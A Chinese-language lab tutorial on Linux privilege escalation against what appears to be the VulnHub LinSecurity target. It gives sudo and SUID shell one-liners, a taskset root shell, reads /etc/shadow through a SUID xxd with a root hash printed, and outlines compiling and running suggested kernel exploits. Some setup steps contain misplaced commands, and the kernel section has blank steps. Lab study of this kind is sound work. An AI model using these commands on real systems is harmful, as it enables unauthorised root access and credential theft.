目錄

一、linux提權(quán)靶場下載與安裝

二、基礎(chǔ)提權(quán)?

?1.sudo提權(quán)

?2.suid提權(quán)

3.taskset執(zhí)行bash?

三、內(nèi)核提權(quán)?

相關(guān)網(wǎng)站

https://gtfobins.github.io/#+sudohttps://blog.csdn.net/weixin_43873557/article/details/113784146

一、linux提權(quán)靶場下載與安裝

#下載鏈接
https://www.vulnhub.com/entry/linsecurity-1,244/用戶名密碼：bob/secret#安裝與配置
1.修改默認(rèn)鍵盤布局[默認(rèn)不是美式鍵盤]
sudo awk 'BEGIN {system("/bin/sh")}'
[修改前\"符號是shift+2]vim /etc/default/keyboard
[講XKBLAYOUT改的值為us]setupcon2.配置網(wǎng)卡[Ubuntu 18通過netplan設(shè)置網(wǎng)絡(luò)]
vim /etc/netplan/50-cloud-init.yaml
[將enp0s3改為ens33]netplan apply

二、基礎(chǔ)提權(quán)?

?1.sudo提權(quán)

sudo權(quán)限是root把本來只能超級用戶執(zhí)行的命令賦予普通用戶執(zhí)行

1. sudo /bin/ash
2. sudo find . -exec /bin/sh \;-quit
3. sudo /bin/bash

sudo -i

?2.suid提權(quán)

suid簡介：SUID這個是uid +s的組合，s指的是特殊權(quán)限。一般情況下，用戶的權(quán)限是3位，比如0755這樣的，特殊權(quán)限默認(rèn)沒有配置，但是如果超級管理員希望用戶在執(zhí)行一些特殊權(quán)限文件時，擁有root的權(quán)限，就會配置特殊權(quán)限

使用find命令快速查找所有suid文件

find / -user root -perm -4000 -print 2>/dev/null

xxd訪問/etc/shadow

-rwsr-x--- 1 root itservices 18552 Apr 10  2018 /usr/bin/xxd

?itservices組具有執(zhí)行權(quán)限，通過/etc/group發(fā)現(xiàn)susan用戶屬于itservices用戶組，利用4.隱藏文件發(fā)現(xiàn)的密碼登錄susan用戶，進(jìn)行提權(quán)

cd home/susan

susan@linsecurity:/home/bob$ xxd "/etc/shadow" |xxd -r
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

3.taskset執(zhí)行bash?

taskset?1?/bin/bash?-p

三、內(nèi)核提權(quán)?

將linux內(nèi)核提權(quán)速查腳本移到Linux系統(tǒng)中

查詢該文件

?

進(jìn)行解壓縮?

?

進(jìn)入解壓后的文件，并執(zhí)行里面的后綴為.sh的文件

?成功后就可以查看推薦的漏洞

?將推薦的漏洞下載到本地，復(fù)制到Linux系統(tǒng)中，進(jìn)行解壓縮

進(jìn)入解壓后的文件

?存在makefile，進(jìn)行編譯make

?查看編譯后的文件，發(fā)現(xiàn)新增，進(jìn)行執(zhí)行該文件

?運(yùn)行文件，不能成功，則換其他漏洞

?